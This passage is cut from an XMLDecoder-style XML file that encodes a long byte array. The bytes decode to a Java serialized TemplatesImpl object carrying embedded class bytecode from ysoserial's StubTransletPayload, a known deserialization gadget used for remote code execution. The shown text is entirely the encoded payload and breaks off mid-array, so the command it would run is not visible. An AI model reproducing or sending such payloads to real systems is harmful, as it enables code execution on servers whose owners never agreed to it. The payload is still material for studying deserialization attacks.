index=\"77\"><byte>12</byte></void><void index=\"78\"><byte>0</byte></void><void index=\"79\"><byte>0</byte></void><void index=\"80\"><byte>0</byte></void><void index=\"81\"><byte>16</byte></void><void index=\"82\"><byte>63</byte></void><void index=\"83\"><byte>64</byte></void><void index=\"84\"><byte>0</byte></void><void index=\"85\"><byte>0</byte></void><void index=\"86\"><byte>0</byte></void><void index=\"87\"><byte>0</byte></void><void index=\"88\"><byte>0</byte></void><void index=\"89\"><byte>2</byte></void><void index=\"90\"><byte>115</byte></void><void index=\"91\"><byte>114</byte></void><void index=\"92\"><byte>0</byte></void><void index=\"93\"><byte>58</byte></void><void index=\"94\"><byte>99</byte></void><void index=\"95\"><byte>111</byte></void><void index=\"96\"><byte>109</byte></void><void index=\"97\"><byte>46</byte></void><void index=\"98\"><byte>115</byte></void><void index=\"99\"><byte>117</byte></void><void index=\"100\"><byte>110</byte></void><void index=\"101\"><byte>46</byte></void><void index=\"102\"><byte>111</byte></void><void index=\"103\"><byte>114</byte></void><void index=\"104\"><byte>103</byte></void><void index=\"105\"><byte>46</byte></void><void index=\"106\"><byte>97</byte></void><void index=\"107\"><byte>112</byte></void><void index=\"108\"><byte>97</byte></void><void index=\"109\"><byte>99</byte></void><void index=\"110\"><byte>104</byte></void><void index=\"111\"><byte>101</byte></void><void index=\"112\"><byte>46</byte></void><void index=\"113\"><byte>120</byte></void><void index=\"114\"><byte>97</byte></void><void index=\"115\"><byte>108</byte></void><void index=\"116\"><byte>97</byte></void><void index=\"117\"><byte>110</byte></void><void index=\"118\"><byte>46</byte></void><void index=\"119\"><byte>105</byte></void><void index=\"120\"><byte>110</byte></void><void index=\"121\"><byte>116</byte></void><void index=\"122\"><byte>101</byte></void><void index=\"123\"><byte>114</byte></void><void index=\"124\"><byte>110</byte></void><void index=\"125\"><byte>97</byte></void><void index=\"126\"><byte>108</byte></void><void index=\"127\"><byte>46</byte></void><void index=\"128\"><byte>120</byte></void><void index=\"129\"><byte>115</byte></void><void index=\"130\"><byte>108</byte></void><void index=\"131\"><byte>116</byte></void><void index=\"132\"><byte>99</byte></void><void index=\"133\"><byte>46</byte></void><void index=\"134\"><byte>116</byte></void><void index=\"135\"><byte>114</byte></void><void index=\"136\"><byte>97</byte></void><void index=\"137\"><byte>120</byte></void><void index=\"138\"><byte>46</byte></void><void index=\"139\"><byte>84</byte></void><void index=\"140\"><byte>101</byte></void><void index=\"141\"><byte>109</byte></void><void index=\"142\"><byte>112</byte></void><void index=\"143\"><byte>108</byte></void><void index=\"144\"><byte>97</byte></void><void index=\"145\"><byte>116</byte></void><void index=\"146\"><byte>101</byte></void><void index=\"147\"><byte>115</byte></void><void index=\"148\"><byte>73</byte></void><void index=\"149\"><byte>109</byte></void><void index=\"150\"><byte>112</byte></void><void index=\"151\"><byte>108</byte></void><void index=\"152\"><byte>9</byte></void><void index=\"153\"><byte>87</byte></void><void index=\"154\"><byte>79</byte></void><void index=\"155\"><byte>-63</byte></void><void index=\"156\"><byte>110</byte></void><void index=\"157\"><byte>-84</byte></void><void index=\"158\"><byte>-85</byte></void><void index=\"159\"><byte>51</byte></void><void index=\"160\"><byte>3</byte></void><void index=\"161\"><byte>0</byte></void><void index=\"162\"><byte>9</byte></void><void index=\"163\"><byte>73</byte></void><void index=\"164\"><byte>0</byte></void><void index=\"165\"><byte>13</byte></void><void index=\"166\"><byte>95</byte></void><void index=\"167\"><byte>105</byte></void><void index=\"168\"><byte>110</byte></void><void index=\"169\"><byte>100</byte></void><void index=\"170\"><byte>101</byte></void><void index=\"171\"><byte>110</byte></void><void index=\"172\"><byte>116</byte></void><void index=\"173\"><byte>78</byte></void><void index=\"174\"><byte>117</byte></void><void index=\"175\"><byte>109</byte></void><void index=\"176\"><byte>98</byte></void><void index=\"177\"><byte>101</byte></void><void index=\"178\"><byte>114</byte></void><void index=\"179\"><byte>73</byte></void><void index=\"180\"><byte>0</byte></void><void index=\"181\"><byte>14</byte></void><void index=\"182\"><byte>95</byte></void><void index=\"183\"><byte>116</byte></void><void index=\"184\"><byte>114</byte></void><void index=\"185\"><byte>97</byte></void><void index=\"186\"><byte>110</byte></void><void index=\"187\"><byte>115</byte></void><void index=\"188\"><byte>108</byte></void><void index=\"189\"><byte>101</byte></void><void index=\"190\"><byte>116</byte></void><void index=\"191\"><byte>73</byte></void><void index=\"192\"><byte>110</byte></void><void index=\"193\"><byte>100</byte></void><void index=\"194\"><byte>101</byte></void><void index=\"195\"><byte>120</byte></void><void index=\"196\"><byte>90</byte></void><void index=\"197\"><byte>0</byte></void><void index=\"198\"><byte>21</byte></void><void index=\"199\"><byte>95</byte></void><void index=\"200\"><byte>117</byte></void><void index=\"201\"><byte>115</byte></void><void index=\"202\"><byte>101</byte></void><void index=\"203\"><byte>83</byte></void><void index=\"204\"><byte>101</byte></void><void index=\"205\"><byte>114</byte></void><void index=\"206\"><byte>118</byte></void><void index=\"207\"><byte>105</byte></void><void index=\"208\"><byte>99</byte></void><void index=\"209\"><byte>101</byte></void><void index=\"210\"><byte>115</byte></void><void index=\"211\"><byte>77</byte></void><void index=\"212\"><byte>101</byte></void><void index=\"213\"><byte>99</byte></void><void index=\"214\"><byte>104</byte></void><void index=\"215\"><byte>97</byte></void><void index=\"216\"><byte>110</byte></void><void index=\"217\"><byte>105</byte></void><void index=\"218\"><byte>115</byte></void><void index=\"219\"><byte>109</byte></void><void index=\"220\"><byte>76</byte></void><void index=\"221\"><byte>0</byte></void><void index=\"222\"><byte>25</byte></void><void index=\"223\"><byte>95</byte></void><void index=\"224\"><byte>97</byte></void><void index=\"225\"><byte>99</byte></void><void index=\"226\"><byte>99</byte></void><void index=\"227\"><byte>101</byte></void><void index=\"228\"><byte>115</byte></void><void index=\"229\"><byte>115</byte></void><void index=\"230\"><byte>69</byte></void><void index=\"231\"><byte>120</byte></void><void index=\"232\"><byte>116</byte></void><void index=\"233\"><byte>101</byte></void><void index=\"234\"><byte>114</byte></void><void index=\"235\"><byte>110</byte></void><void index=\"236\"><byte>97</byte></void><void index=\"237\"><byte>108</byte></void><void index=\"238\"><byte>83</byte></void><void index=\"239\"><byte>116</byte></void><void index=\"240\"><byte>121</byte></void><void index=\"241\"><byte>108</byte></void><void index=\"242\"><byte>101</byte></void><void index=\"243\"><byte>115</byte></void><void index=\"244\"><byte>104</byte></void><void index=\"245\"><byte>101</byte></void><void index=\"246\"><byte>101</byte></void><void index=\"247\"><byte>116</byte></void><void index=\"248\"><byte>116</byte></void><void index=\"249\"><byte>0</byte></void><void index=\"250\"><byte>18</byte></void><void index=\"251\"><byte>76</byte></void><void index=\"252\"><byte>106</byte></void><void index=\"253\"><byte>97</byte></void><void index=\"254\"><byte>118</byte></void><void index=\"255\"><byte>97</byte></void><void index=\"256\"><byte>47</byte></void><void index=\"257\"><byte>108</byte></void><void index=\"258\"><byte>97</byte></void><void index=\"259\"><byte>110</byte></void><void index=\"260\"><byte>103</byte></void><void index=\"261\"><byte>47</byte></void><void index=\"262\"><byte>83</byte></void><void index=\"263\"><byte>116</byte></void><void index=\"264\"><byte>114</byte></void><void index=\"265\"><byte>105</byte></void><void index=\"266\"><byte>110</byte></void><void index=\"267\"><byte>103</byte></void><void index=\"268\"><byte>59</byte></void><void index=\"269\"><byte>76</byte></void><void index=\"270\"><byte>0</byte></void><void index=\"271\"><byte>11</byte></void><void index=\"272\"><byte>95</byte></void><void index=\"273\"><byte>97</byte></void><void index=\"274\"><byte>117</byte></void><void index=\"275\"><byte>120</byte></void><void index=\"276\"><byte>67</byte></void><void index=\"277\"><byte>108</byte></void><void index=\"278\"><byte>97</byte></void><void index=\"279\"><byte>115</byte></void><void index=\"280\"><byte>115</byte></void><void index=\"281\"><byte>101</byte></void><void index=\"282\"><byte>115</byte></void><void index=\"283\"><byte>116</byte></void><void index=\"284\"><byte>0</byte></void><void index=\"285\"><byte>59</byte></void><void index=\"286\"><byte>76</byte></void><void index=\"287\"><byte>99</byte></void><void index=\"288\"><byte>111</byte></void><void index=\"289\"><byte>109</byte></void><void index=\"290\"><byte>47</byte></void><void index=\"291\"><byte>115</byte></void><void index=\"292\"><byte>117</byte></void><void index=\"293\"><byte>110</byte></void><void index=\"294\"><byte>47</byte></void><void index=\"295\"><byte>111</byte></void><void index=\"296\"><byte>114</byte></void><void index=\"297\"><byte>103</byte></void><void index=\"298\"><byte>47</byte></void><void index=\"299\"><byte>97</byte></void><void index=\"300\"><byte>112</byte></void><void index=\"301\"><byte>97</byte></void><void index=\"302\"><byte>99</byte></void><void index=\"303\"><byte>104</byte></void><void index=\"304\"><byte>101</byte></void><void index=\"305\"><byte>47</byte></void><void index=\"306\"><byte>120</byte></void><void index=\"307\"><byte>97</byte></void><void index=\"308\"><byte>108</byte></void><void index=\"309\"><byte>97</byte></void><void index=\"310\"><byte>110</byte></void><void index=\"311\"><byte>47</byte></void><void index=\"312\"><byte>105</byte></void><void index=\"313\"><byte>110</byte></void><void index=\"314\"><byte>116</byte></void><void index=\"315\"><byte>101</byte></void><void index=\"316\"><byte>114</byte></void><void index=\"317\"><byte>110</byte></void><void index=\"318\"><byte>97</byte></void><void index=\"319\"><byte>108</byte></void><void index=\"320\"><byte>47</byte></void><void index=\"321\"><byte>120</byte></void><void index=\"322\"><byte>115</byte></void><void index=\"323\"><byte>108</byte></void><void index=\"324\"><byte>116</byte></void><void index=\"325\"><byte>99</byte></void><void index=\"326\"><byte>47</byte></void><void index=\"327\"><byte>114</byte></void><void index=\"328\"><byte>117</byte></void><void index=\"329\"><byte>110</byte></void><void index=\"330\"><byte>116</byte></void><void index=\"331\"><byte>105</byte></void><void index=\"332\"><byte>109</byte></void><void index=\"333\"><byte>101</byte></void><void index=\"334\"><byte>47</byte></void><void index=\"335\"><byte>72</byte></void><void index=\"336\"><byte>97</byte></void><void index=\"337\"><byte>115</byte></void><void index=\"338\"><byte>104</byte></void><void index=\"339\"><byte>116</byte></void><void index=\"340\"><byte>97</byte></void><void index=\"341\"><byte>98</byte></void><void index=\"342\"><byte>108</byte></void><void index=\"343\"><byte>101</byte></void><void index=\"344\"><byte>59</byte></void><void index=\"345\"><byte>91</byte></void><void index=\"346\"><byte>0</byte></void><void index=\"347\"><byte>10</byte></void><void index=\"348\"><byte>95</byte></void><void index=\"349\"><byte>98</byte></void><void index=\"350\"><byte>121</byte></void><void index=\"351\"><byte>116</byte></void><void index=\"352\"><byte>101</byte></void><void index=\"353\"><byte>99</byte></void><void index=\"354\"><byte>111</byte></void><void index=\"355\"><byte>100</byte></void><void index=\"356\"><byte>101</byte></void><void index=\"357\"><byte>115</byte></void><void index=\"358\"><byte>116</byte></void><void index=\"359\"><byte>0</byte></void><void index=\"360\"><byte>3</byte></void><void index=\"361\"><byte>91</byte></void><void index=\"362\"><byte>91</byte></void><void index=\"363\"><byte>66</byte></void><void index=\"364\"><byte>91</byte></void><void index=\"365\"><byte>0</byte></void><void index=\"366\"><byte>6</byte></void><void index=\"367\"><byte>95</byte></void><void index=\"368\"><byte>99</byte></void><void index=\"369\"><byte>108</byte></void><void index=\"370\"><byte>97</byte></void><void index=\"371\"><byte>115</byte></void><void index=\"372\"><byte>115</byte></void><void index=\"373\"><byte>116</byte></void><void index=\"374\"><byte>0</byte></void><void index=\"375\"><byte>18</byte></void><void index=\"376\"><byte>91</byte></void><void index=\"377\"><byte>76</byte></void><void index=\"378\"><byte>106</byte></void><void index=\"379\"><byte>97</byte></void><void index=\"380\"><byte>118</byte></void><void index=\"381\"><byte>97</byte></void><void index=\"382\"><byte>47</byte></void><void index=\"383\"><byte>108</byte></void><void index=\"384\"><byte>97</byte></void><void index=\"385\"><byte>110</byte></void><void index=\"386\"><byte>103</byte></void><void index=\"387\"><byte>47</byte></void><void index=\"388\"><byte>67</byte></void><void index=\"389\"><byte>108</byte></void><void index=\"390\"><byte>97</byte></void><void index=\"391\"><byte>115</byte></void><void index=\"392\"><byte>115</byte></void><void index=\"393\"><byte>59</byte></void><void index=\"394\"><byte>76</byte></void><void index=\"395\"><byte>0</byte></void><void index=\"396\"><byte>5</byte></void><void index=\"397\"><byte>95</byte></void><void index=\"398\"><byte>110</byte></void><void index=\"399\"><byte>97</byte></void><void index=\"400\"><byte>109</byte></void><void index=\"401\"><byte>101</byte></void><void index=\"402\"><byte>113</byte></void><void index=\"403\"><byte>0</byte></void><void index=\"404\"><byte>126</byte></void><void index=\"405\"><byte>0</byte></void><void index=\"406\"><byte>4</byte></void><void index=\"407\"><byte>76</byte></void><void index=\"408\"><byte>0</byte></void><void index=\"409\"><byte>17</byte></void><void index=\"410\"><byte>95</byte></void><void index=\"411\"><byte>111</byte></void><void index=\"412\"><byte>117</byte></void><void index=\"413\"><byte>116</byte></void><void index=\"414\"><byte>112</byte></void><void index=\"415\"><byte>117</byte></void><void index=\"416\"><byte>116</byte></void><void index=\"417\"><byte>80</byte></void><void index=\"418\"><byte>114</byte></void><void index=\"419\"><byte>111</byte></void><void index=\"420\"><byte>112</byte></void><void index=\"421\"><byte>101</byte></void><void index=\"422\"><byte>114</byte></void><void index=\"423\"><byte>116</byte></void><void index=\"424\"><byte>105</byte></void><void index=\"425\"><byte>101</byte></void><void index=\"426\"><byte>115</byte></void><void index=\"427\"><byte>116</byte></void><void index=\"428\"><byte>0</byte></void><void index=\"429\"><byte>22</byte></void><void index=\"430\"><byte>76</byte></void><void index=\"431\"><byte>106</byte></void><void index=\"432\"><byte>97</byte></void><void index=\"433\"><byte>118</byte></void><void index=\"434\"><byte>97</byte></void><void index=\"435\"><byte>47</byte></void><void index=\"436\"><byte>117</byte></void><void index=\"437\"><byte>116</byte></void><void index=\"438\"><byte>105</byte></void><void index=\"439\"><byte>108</byte></void><void index=\"440\"><byte>47</byte></void><void index=\"441\"><byte>80</byte></void><void index=\"442\"><byte>114</byte></void><void index=\"443\"><byte>111</byte></void><void index=\"444\"><byte>112</byte></void><void index=\"445\"><byte>101</byte></void><void index=\"446\"><byte>114</byte></void><void index=\"447\"><byte>116</byte></void><void index=\"448\"><byte>105</byte></void><void index=\"449\"><byte>101</byte></void><void index=\"450\"><byte>115</byte></void><void index=\"451\"><byte>59</byte></void><void index=\"452\"><byte>120</byte></void><void index=\"453\"><byte>112</byte></void><void index=\"454\"><byte>0</byte></void><void index=\"455\"><byte>0</byte></void><void index=\"456\"><byte>0</byte></void><void index=\"457\"><byte>0</byte></void><void index=\"458\"><byte>-1</byte></void><void index=\"459\"><byte>-1</byte></void><void index=\"460\"><byte>-1</byte></void><void index=\"461\"><byte>-1</byte></void><void index=\"462\"><byte>0</byte></void><void index=\"463\"><byte>116</byte></void><void index=\"464\"><byte>0</byte></void><void index=\"465\"><byte>3</byte></void><void index=\"466\"><byte>97</byte></void><void index=\"467\"><byte>108</byte></void><void index=\"468\"><byte>108</byte></void><void index=\"469\"><byte>112</byte></void><void index=\"470\"><byte>117</byte></void><void index=\"471\"><byte>114</byte></void><void index=\"472\"><byte>0</byte></void><void index=\"473\"><byte>3</byte></void><void index=\"474\"><byte>91</byte></void><void index=\"475\"><byte>91</byte></void><void index=\"476\"><byte>66</byte></void><void index=\"477\"><byte>75</byte></void><void index=\"478\"><byte>-3</byte></void><void index=\"479\"><byte>25</byte></void><void index=\"480\"><byte>21</byte></void><void index=\"481\"><byte>103</byte></void><void index=\"482\"><byte>103</byte></void><void index=\"483\"><byte>-37</byte></void><void index=\"484\"><byte>55</byte></void><void index=\"485\"><byte>2</byte></void><void index=\"486\"><byte>0</byte></void><void index=\"487\"><byte>0</byte></void><void index=\"488\"><byte>120</byte></void><void index=\"489\"><byte>112</byte></void><void index=\"490\"><byte>0</byte></void><void index=\"491\"><byte>0</byte></void><void index=\"492\"><byte>0</byte></void><void index=\"493\"><byte>2</byte></void><void index=\"494\"><byte>117</byte></void><void index=\"495\"><byte>114</byte></void><void index=\"496\"><byte>0</byte></void><void index=\"497\"><byte>2</byte></void><void index=\"498\"><byte>91</byte></void><void index=\"499\"><byte>66</byte></void><void index=\"500\"><byte>-84</byte></void><void index=\"501\"><byte>-13</byte></void><void index=\"502\"><byte>23</byte></void><void index=\"503\"><byte>-8</byte></void><void index=\"504\"><byte>6</byte></void><void index=\"505\"><byte>8</byte></void><void index=\"506\"><byte>84</byte></void><void index=\"507\"><byte>-32</byte></void><void index=\"508\"><byte>2</byte></void><void index=\"509\"><byte>0</byte></void><void index=\"510\"><byte>0</byte></void><void index=\"511\"><byte>120</byte></void><void index=\"512\"><byte>112</byte></void><void index=\"513\"><byte>0</byte></void><void index=\"514\"><byte>0</byte></void><void index=\"515\"><byte>14</byte></void><void index=\"516\"><byte>29</byte></void><void index=\"517\"><byte>-54</byte></void><void index=\"518\"><byte>-2</byte></void><void index=\"519\"><byte>-70</byte></void><void index=\"520\"><byte>-66</byte></void><void index=\"521\"><byte>0</byte></void><void index=\"522\"><byte>0</byte></void><void index=\"523\"><byte>0</byte></void><void index=\"524\"><byte>50</byte></void><void index=\"525\"><byte>0</byte></void><void index=\"526\"><byte>-70</byte></void><void index=\"527\"><byte>10</byte></void><void index=\"528\"><byte>0</byte></void><void index=\"529\"><byte>3</byte></void><void index=\"530\"><byte>0</byte></void><void index=\"531\"><byte>34</byte></void><void index=\"532\"><byte>7</byte></void><void index=\"533\"><byte>0</byte></void><void index=\"534\"><byte>-72</byte></void><void index=\"535\"><byte>7</byte></void><void index=\"536\"><byte>0</byte></void><void index=\"537\"><byte>37</byte></void><void index=\"538\"><byte>7</byte></void><void index=\"539\"><byte>0</byte></void><void index=\"540\"><byte>38</byte></void><void index=\"541\"><byte>1</byte></void><void index=\"542\"><byte>0</byte></void><void index=\"543\"><byte>16</byte></void><void index=\"544\"><byte>115</byte></void><void index=\"545\"><byte>101</byte></void><void index=\"546\"><byte>114</byte></void><void index=\"547\"><byte>105</byte></void><void index=\"548\"><byte>97</byte></void><void index=\"549\"><byte>108</byte></void><void index=\"550\"><byte>86</byte></void><void index=\"551\"><byte>101</byte></void><void index=\"552\"><byte>114</byte></void><void index=\"553\"><byte>115</byte></void><void index=\"554\"><byte>105</byte></void><void index=\"555\"><byte>111</byte></void><void index=\"556\"><byte>110</byte></void><void index=\"557\"><byte>85</byte></void><void index=\"558\"><byte>73</byte></void><void index=\"559\"><byte>68</byte></void><void index=\"560\"><byte>1</byte></void><void index=\"561\"><byte>0</byte></void><void index=\"562\"><byte>1</byte></void><void index=\"563\"><byte>74</byte></void><void index=\"564\"><byte>1</byte></void><void index=\"565\"><byte>0</byte></void><void index=\"566\"><byte>13</byte></void><void index=\"567\"><byte>67</byte></void><void index=\"568\"><byte>111</byte></void><void index=\"569\"><byte>110</byte></void><void index=\"570\"><byte>115</byte></void><void index=\"571\"><byte>116</byte></void><void index=\"572\"><byte>97</byte></void><void index=\"573\"><byte>110</byte></void><void index=\"574\"><byte>116</byte></void><void index=\"575\"><byte>86</byte></void><void index=\"576\"><byte>97</byte></void><void index=\"577\"><byte>108</byte></void><void index=\"578\"><byte>117</byte></void><void index=\"579\"><byte>101</byte></void><void index=\"580\"><byte>5</byte></void><void index=\"581\"><byte>-83</byte></void><void index=\"582\"><byte>32</byte></void><void index=\"583\"><byte>-109</byte></void><void index=\"584\"><byte>-13</byte></void><void index=\"585\"><byte>-111</byte></void><void index=\"586\"><byte>-35</byte></void><void index=\"587\"><byte>-17</byte></void><void index=\"588\"><byte>62</byte></void><void index=\"589\"><byte>1</byte></void><void index=\"590\"><byte>0</byte></void><void index=\"591\"><byte>6</byte></void><void index=\"592\"><byte>60</byte></void><void index=\"593\"><byte>105</byte></void><void index=\"594\"><byte>110</byte></void><void index=\"595\"><byte>105</byte></void><void index=\"596\"><byte>116</byte></void><void index=\"597\"><byte>62</byte></void><void index=\"598\"><byte>1</byte></void><void index=\"599\"><byte>0</byte></void><void index=\"600\"><byte>3</byte></void><void index=\"601\"><byte>40</byte></void><void index=\"602\"><byte>41</byte></void><void index=\"603\"><byte>86</byte></void><void index=\"604\"><byte>1</byte></void><void index=\"605\"><byte>0</byte></void><void index=\"606\"><byte>4</byte></void><void index=\"607\"><byte>67</byte></void><void index=\"608\"><byte>111</byte></void><void index=\"609\"><byte>100</byte></void><void index=\"610\"><byte>101</byte></void><void index=\"611\"><byte>1</byte></void><void index=\"612\"><byte>0</byte></void><void index=\"613\"><byte>15</byte></void><void index=\"614\"><byte>76</byte></void><void index=\"615\"><byte>105</byte></void><void index=\"616\"><byte>110</byte></void><void index=\"617\"><byte>101</byte></void><void index=\"618\"><byte>78</byte></void><void index=\"619\"><byte>117</byte></void><void index=\"620\"><byte>109</byte></void><void index=\"621\"><byte>98</byte></void><void index=\"622\"><byte>101</byte></void><void index=\"623\"><byte>114</byte></void><void index=\"624\"><byte>84</byte></void><void index=\"625\"><byte>97</byte></void><void index=\"626\"><byte>98</byte></void><void index=\"627\"><byte>108</byte></void><void index=\"628\"><byte>101</byte></void><void index=\"629\"><byte>1</byte></void><void index=\"630\"><byte>0</byte></void><void index=\"631\"><byte>18</byte></void><void index=\"632\"><byte>76</byte></void><void index=\"633\"><byte>111</byte></void><void index=\"634\"><byte>99</byte></void><void index=\"635\"><byte>97</byte></void><void index=\"636\"><byte>108</byte></void><void index=\"637\"><byte>86</byte></void><void index=\"638\"><byte>97</byte></void><void index=\"639\"><byte>114</byte></void><void index=\"640\"><byte>105</byte></void><void index=\"641\"><byte>97</byte></void><void index=\"642\"><byte>98</byte></void><void index=\"643\"><byte>108</byte></void><void index=\"644\"><byte>101</byte></void><void index=\"645\"><byte>84</byte></void><void index=\"646\"><byte>97</byte></void><void index=\"647\"><byte>98</byte></void><void index=\"648\"><byte>108</byte></void><void index=\"649\"><byte>101</byte></void><void index=\"650\"><byte>1</byte></void><void index=\"651\"><byte>0</byte></void><void index=\"652\"><byte>4</byte></void><void index=\"653\"><byte>116</byte></void><void index=\"654\"><byte>104</byte></void><void index=\"655\"><byte>105</byte></void><void index=\"656\"><byte>115</byte></void><void index=\"657\"><byte>1</byte></void><void index=\"658\"><byte>0</byte></void><void index=\"659\"><byte>19</byte></void><void index=\"660\"><byte>83</byte></void><void index=\"661\"><byte>116</byte></void><void index=\"662\"><byte>117</byte></void><void index=\"663\"><byte>98</byte></void><void index=\"664\"><byte>84</byte></void><void index=\"665\"><byte>114</byte></void><void index=\"666\"><byte>97</byte></void><void index=\"667\"><byte>110</byte></void><void index=\"668\"><byte>115</byte></void><void index=\"669\"><byte>108</byte></void><void index=\"670\"><byte>101</byte></void><void index=\"671\"><byte>116</byte></void><void index=\"672\"><byte>80</byte></void><void index=\"673\"><byte>97</byte></void><void index=\"674\"><byte>121</byte></void><void index=\"675\"><byte>108</byte></void><void index=\"676\"><byte>111</byte></void><void index=\"677\"><byte>97</byte></void><void index=\"678\"><byte>100</byte></void><void index=\"679\"><byte>1</byte></void><void index=\"680\"><byte>0</byte></void><void index=\"681\"><byte>12</byte></void><void index=\"682\"><byte>73</byte></void><void index=\"683\"><byte>110</byte></void><void index=\"684\"><byte>110</byte></void><void index=\"685\"><byte>101</byte></void><void index=\"686\"><byte>114</byte></void><void index=\"687\"><byte>67</byte></void><void index=\"688\"><byte>108</byte></void><void index=\"689\"><byte>97</byte></void><void index=\"690\"><byte>115</byte></void><void index=\"691\"><byte>115</byte></void><void index=\"692\"><byte>101</byte></void><void index=\"693\"><byte>115</byte></void><void index=\"694\"><byte>1</byte></void><void index=\"695\"><byte>0</byte></void><void index=\"696\"><byte>53</byte></void><void index=\"697\"><byte>76</byte></void><void index=\"698\"><byte>121</byte></void><void index=\"699\"><byte>115</byte></void><void index=\"700\"><byte>111</byte></void><void index=\"701\"><byte>115</byte></void><void index=\"702\"><byte>101</byte></void><void index=\"703\"><byte>114</byte></void><void index=\"704\"><byte>105</byte></void><void index=\"705\"><byte>97</byte></void><void index=\"706\"><byte>108</byte></void><void index=\"707\"><byte>47</byte></void><void index=\"708\"><byte>112</byte></void><void index=\"709\"><byte>97</byte></void><void index=\"710\"><byte>121</byte></void><void index=\"711\"><byte>108</byte></void><void index=\"712\"><byte>111</byte></void><void index=\"713\"><byte>97</byte></void><void index=\"714\"><byte>100</byte></void><void index=\"715\"><byte>115</byte></void><void index=\"716\"><byte>47</byte></void><void index=\"717\"><byte>117</byte></void><void index=\"718\"><byte>116</byte></void><void index=\"719\"><byte>105</byte></void><void index=\"720\"><byte>108</byte></void><void index=\"721\"><byte>47</byte></void><void index=\"722\"><byte>71</byte></void><void index=\"723\"><byte>97</byte></void><void index=\"724\"><byte>100</byte></void><void index=\"725\"><byte>103</byte></void><void index=\"726\"><byte>101</byte></void><void index=\"727\"><byte>116</byte></void><void index=\"728\"><byte>115</byte></void><void index=\"729\"><byte>36</byte></void><void index=\"730\"><byte>83</byte></void><void index=\"731\"><byte>116</byte></void><void index=\"732\"><byte>117</byte></void><void index=\"733\"><byte>98</byte></void><void index=\"734\"><byte>84</byte></void><void index=\"735\"><byte>114</byte></void><void index=\"736\"><byte>97</byte></void><void index=\"737\"><byte>110</byte></void><void index=\"738\"><byte>115</byte></void><void index=\"739\"><byte>108</byte></void><void index=\"740\"><byte>101</byte></void><void index=\"741\"><byte>116</byte></void><void index=\"742\"><byte>80</byte></void><void index=\"743\"><byte>97</byte></void><void index=\"744\"><byte>121</byte></void><void index=\"745\"><byte>108</byte></void><void index=\"746\"><byte>111</byte></void><void index=\"747\"><byte>97</byte></void><void index=\"748\"><byte>100</byte></void><void index=\"749\"><byte>59</byte></void><void index=\"750\"><byte>1</byte></void><void index=\"751\"><byte>0</byte></void><void index=\"752\"><byte>9</byte></void><void index=\"753\"><byte>116</byte></void><void index=\"754\"><byte>114</byte></void><void index=\"755\"><byte>97</byte></void><void index=\"756\"><byte>110</byte></void><void index=\"757\"><byte>115</byte></void><void index=\"758\"><byte>102</byte></void><void index=\"759\"><byte>111</byte></void><void index=\"760\"><byte>114</byte></void><void index=\"761\"><byte>109</byte></void><void index=\"762\"><byte>1</byte></void><void index=\"763\"><byte>0</byte></void><void index=\"764\"><byte>114</byte></void><void index=\"765\"><byte>40</byte></void><void index=\"766\"><byte>76</byte></void><void index=\"767\"><byte>99</byte></void><void index=\"768\"><byte>111</byte></void><void index=\"769\"><byte>109</byte></void><void index=\"770\"><byte>47</byte></void><void index=\"771\"><byte>115</byte></void><void index=\"772\"><byte>117</byte></void><void index=\"773\"><byte>110</byte></void><void index=\"774\"><byte>47</byte></void><void index=\"775\"><byte>111</byte></void><void index=\"776\"><byte>114</byte></void><void index=\"777\"><byte>103</byte></void><void index=\"778\"><byte>47</byte></void><void index=\"779\"><byte>97</byte></void><void index=\"780\"><byte>112</byte></void><void index=\"781\"><byte>97</byte></void><void index=\"782\"><byte>99</byte></void><void index=\"783\"><byte>104</byte></void><void index=\"784\"><byte>101</byte></void><void index=\"785\"><byte>47</byte></void><void index=\"786\"><byte>120</byte></void><void index=\"787\"><byte>97</byte></void><void index=\"788\"><byte>108</byte></void><void index=\"789\"><byte>97</byte></void><void index=\"790\"><byte>110</byte></void><void index=\"791\"><byte>47</byte></void><void index=\"792\"><byte>105</byte></void><void index=\"793\"><byte>110</byte></void><void index=\"794\"><byte>116</byte></void><void index=\"795\"><byte>101</byte></void><void index=\"796\"><byte>114</byte></void><void index=\"797\"><byte>110</byte></void><void index=\"798\"><byte>97</byte></void><void index=\"799\"><byte>108</byte></void><void index=\"800\"><byte>47</byte></void><void index=\"801\"><byte>120</byte></void><void index=\"802\"><byte>115</byte></void><void index=\"803\"><byte>108</byte></void><void index=\"804\"><byte>116</byte></void><void index=\"805\"><byte>99</byte></void><void index=\"806\"><byte>47</byte></void><void index=\"807\"><byte>68</byte></void><void index=\"808\"><byte>79</byte></void><void index=\"809\"><byte>77</byte></void><void index=\"810\"><byte>59</byte></void><void index=\"811\"><byte>91</byte></void><void index=\"812\"><byte>76</byte></void><void index=\"813\"><byte>99</byte></void><void index=\"814\"><byte>111</byte></void><void index=\"815\"><byte>109</byte></void><void index=\"816\"><byte>47</byte></void><void index=\"817\"><byte>115</byte></void><void index=\"818\"><byte>117</byte></void><void index=\"819\"><byte>110</byte></void><void index=\"820\"><byte>47</byte></void><void index=\"821\"><byte>111</byte></void><void index=\"822\"><byte>114</byte></void><void index=\"823\"><byte>103</byte></void><void index=\"824\"><byte>47</byte></void><void index=\"825\"><byte>97</byte></void><void index=\"826\"><byte>112</byte></void><void index=\"827\"><byte>97</byte></void><void index=\"828\"><byte>99</byte></void><void index=\"829\"><byte>104</byte></void><void index=\"830\"><byte>101</byte></void><void index=\"831\"><byte>47</byte></void><void index=\"832\"><byte>120</byte></void><void index=\"833\"><byte>109</byte></void><void index=\"834\"><byte>108</byte></void><void index=\"835\"><byte>47</byte></void><void index=\"836\"><byte>105</byte></void><void index=\"837\"><byte>110</byte></void><void index=\"838\"><byte>116</byte></void><void index=\"839\"><byte>101</byte></void><void index=\"840\"><byte>114</byte></void><void index=\"841\"><byte>110</byte></void><void index=\"842\"><byte>97</byte></void><void index=\"843\"><byte>108</byte></void><void index=\"844\"><byte>47</byte></void><void index=\"845\"><byte>115</byte></void><void index=\"846\"><byte>101</byte></void><void index=\"847\"><byte>114</byte></void><void index=\"848\"><byte>105</byte></void><void index=\"849\"><byte>97</byte></void><void index=\"850\"><byte>108</byte></void><void index=\"851\"><byte>105</byte></void><void index=\"852\"><byte>122</byte></void><void index=\"853\"><byte>101</byte></void><void index=\"854\"><byte>114</byte></void><void index=\"855\"><byte>47</byte></void><void index=\"856\"><byte>83</byte></void><void index=\"857\"><byte>101</byte></void><void index=\"858\"><byte>114</byte></void><void index=\"859\"><byte>105</byte></void><void index=\"860\"><byte>97</byte></void><void index=\"861\"><byte>108</byte></void><void index=\"862\"><byte>105</byte></void><void index=\"863\"><byte>122</byte></void><void index=\"864\"><byte>97</byte></void><void 